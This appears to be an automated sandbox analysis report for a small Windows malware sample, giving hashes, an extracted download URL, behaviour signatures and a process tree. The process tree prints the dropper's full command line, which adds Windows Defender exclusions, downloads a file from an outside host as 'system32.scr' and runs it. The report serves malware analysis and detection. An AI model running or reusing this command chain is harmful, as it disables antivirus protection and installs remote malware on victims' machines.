Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
20-09-2024 20:01
Static task
static1
Behavioral task
behavioral1
Sample
ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe
-
Size
5KB
-
MD5
ee53c22fb468250a322d4e4af41d7cf4
-
SHA1
ad4fd512fbe16266cc5d61557a7586e7acb92ac5
-
SHA256
064108b26f82e4cf579d93efb547401cc61436c1027edede6bd5ecf601cc8b8a
-
SHA512
2e3af9ac12cc85e3f5a84dec9114c392f643389a1e29b9b85eadcab17671baadc640265bc52463d14fe603211ee0d2a6e6ec1cf495dede8b8aa3592a09d1d2ec
-
SSDEEP
96:xFNM1k9DrbN793yG6dihlu6O4mNnkOGX3aLlYR:xvuAF93yXihf9EUXaY
Malware Config
Extracted
http://f0550716.xsph.ru/U3ew1mckZfTHHAs
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 13 440 powershell.exe -
pid Process 3392 powershell.exe 684 powershell.exe 4792 powershell.exe 440 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 684 powershell.exe 684 powershell.exe 4792 powershell.exe 4792 powershell.exe 440 powershell.exe 440 powershell.exe 3392 powershell.exe 3392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 684 powershell.exe Token: SeDebugPrivilege 4792 powershell.exe Token: SeDebugPrivilege 440 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 4088 wrote to memory of 1660 4088 ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe 82 PID 4088 wrote to memory of 1660 4088 ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe 82 PID 1660 wrote to memory of 684 1660 cmd.exe 84 PID 1660 wrote to memory of 684 1660 cmd.exe 84 PID 1660 wrote to memory of 4792 1660 cmd.exe 85 PID 1660 wrote to memory of 4792 1660 cmd.exe 85 PID 1660 wrote to memory of 440 1660 cmd.exe 86 PID 1660 wrote to memory of 440 1660 cmd.exe 86 PID 1660 wrote to memory of 3392 1660 cmd.exe 87 PID 1660 wrote to memory of 3392 1660 cmd.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath @('%UserProfile%','%AppData%','%Temp%','%SystemRoot%','%HomeDrive%','%SystemDrive%') -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','scr','bat','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('http://f0550716.xsph.ru/U3ew1mckZfTHHAs', '%Temp%\\system32.scr') & powershell Start-Process -FilePath '%Temp%\\system32.scr' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath @('C:\Users\Admin','C:\Users\Admin\AppData\Roaming','C:\Users\Admin\AppData\Local\Temp','C:\Windows','C:','C:') -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionExtension @('exe','scr','bat','dll') -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://f0550716.xsph.ru/U3ew1mckZfTHHAs', 'C:\Users\Admin\AppData\Local\Temp\\system32.scr')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\system32.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
944B
MD53072fa0040b347c3941144486bf30c6f
SHA1e6dc84a5bd882198583653592f17af1bf8cbfc68
SHA256da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e
SHA51262df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c
-
Filesize
1KB
MD56b9b712115bedbedbd0cd0ff3f6c31ed
SHA179433d9defb3a7d01855a787c5cb2bdcd2d90a3c
SHA256c63b68f822656c89132bf75f4a0086531d9a6f1c8ceddc87c6464dfa784d27f3
SHA512fd729d47dbfbed4bff6e5b8aaf0196aad36d241d98cc46baecc2edd5a2f2bc21c2d98b14869707709245607b086e8702400a0157d8d1ab7d1c764f5e202fd51a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82